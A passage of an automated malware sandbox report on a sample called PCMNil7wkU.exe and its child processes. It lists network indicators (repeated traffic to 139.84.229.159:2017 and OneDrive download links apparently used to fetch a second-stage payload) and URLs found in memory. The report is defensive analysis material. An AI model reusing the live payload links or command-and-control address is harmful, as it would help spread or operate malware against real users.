              Source: Yara matchFile source: 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\PCMNil7wkU.exeCode function: 0_2_0415BB38 InternetCheckConnectionA,0_2_0415BB38
              Source: global trafficTCP traffic: 192.168.2.5:49707 -> 139.84.229.159:2017
              Source: Joe Sandbox ViewIP Address: 150.171.43.11 150.171.43.11
              Source: Joe Sandbox ViewASN Name: LASALLEUS LASALLEUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: unknownTCP traffic detected without corresponding DNS query: 139.84.229.159
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: global trafficHTTP traffic detected: GET /download?resid=31BDC6BCA3597F9E%21303&authkey=!AB8-UOmGwry3Ua0 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: onedrive.live.com
              Source: unknownDNS traffic detected: queries for: onedrive.live.com
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: PCMNil7wkU.exe, 00000000.00000003.2000562781.000000007EA70000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.2000229761.000000001C121000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2026149602.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2155123702.0000000004106000.00000004.00001000.00020000.00000000.sdmp, vokleakA.pif.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.verisign.
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              Source: vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
              Source: vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/D
              Source: vokleakA.pif, 00000004.00000003.2070342833.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2635294332.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2489022393.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2070217424.000000003454F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.3203036106.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.3191396474.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2222921402.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2913394854.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2785648387.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2070269486.0000000034589000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2350036517.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3235072816.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2071896130.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.3064045046.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2211215720.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2925094021.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2361909846.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2774268499.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2647081701.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: vokleakA.pif, 00000004.00000003.2070342833.00000000345B0000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2070217424.000000003454F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2069932196.00000000345C2000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2070269486.0000000034589000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?491765ff7047f
              Source: vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabns
              Source: vokleakA.pif, 00000004.00000002.3229902141.000000002FEF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enUn~~1
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: PCMNil7wkU.exe, 00000000.00000003.2000562781.000000007EA70000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.2000229761.000000001C121000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2026149602.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2155123702.0000000004106000.00000004.00001000.00020000.00000000.sdmp, vokleakA.pif.0.drString found in binary or memory: http://ocsp.comodoca.com0$
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: http://ocsp.sectigo.com0C
              Source: vokleakA.pif, 00000004.00000002.3232986846.0000000032001000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232986846.00000000320CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
              Source: PCMNil7wkU.exe, 00000000.00000003.2000562781.000000007EA70000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.2000229761.000000001C121000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2026149602.000000007FBAF000.00000004.00001000.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2155123702.0000000004106000.00000004.00001000.00020000.00000000.sdmp, vokleakA.pif.0.drString found in binary or memory: http://www.pmail.com0
              Source: vokleakA.pif, 00000004.00000002.3236086570.0000000034C30000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3234827189.0000000033005000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3231455103.0000000031BA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000004.00000002.3232319967.0000000031E40000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000004.00000003.2004312948.000000002FF10000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000003.2152494125.000000002436F000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2218828433.0000000025DA3000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219608326.0000000026FC5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219907724.0000000028550000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000007.00000002.2219783452.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2319744626.0000000031B53000.00000004.00000020.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321053315.0000000034490000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2321189824.0000000034AF0000.00000004.08000000.00040000.00000000.sdmp, vokleakA.pif, 00000009.00000002.2320763102.0000000032EF5000.00000004.00000800.00020000.00000000.sdmp, vokleakA.pif, 00000009.00000003.2236787537.000000002FF3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
              Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/
              Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/#
              Source: Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://live.com/&
              Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.0000000000862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/
              Source: Akaelkov.PIF, 00000008.00000003.2235031941.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000002.2236274248.0000000000905000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/c#
              Source: Akaelkov.PIF, 00000008.00000002.2247159296.0000000017CB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21303&authkey=
              Source: PCMNil7wkU.exe, 00000000.00000002.2025309682.000000007F030000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2023177675.000000001BFE2000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1997190611.000000001BBE5000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2006373680.0000000002837000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1993157021.000000007EA80000.00000004.00001000.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000003.1992888049.000000007EAD0000.00000004.00001000.00020000.00000000.sdmp, truesight.sys.0.drString found in binary or memory: https://sectigo.com/CPS0
              Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000005.00000002.2150878056.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Akaelkov.PIF, 00000008.00000003.2235031941.0000000000931000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypeqqw.sn.files.1drv.com/
              Source: PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, PCMNil7wkU.exe, 00000000.00000002.2003678566.00000000008AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ypeqqw.sn.files.1drv.com/y4m7sysDQdikYirqK3HU2YBJGcfNuayvML9a1KtZdylT83JiYtGvaZtziPItDVfkIWB
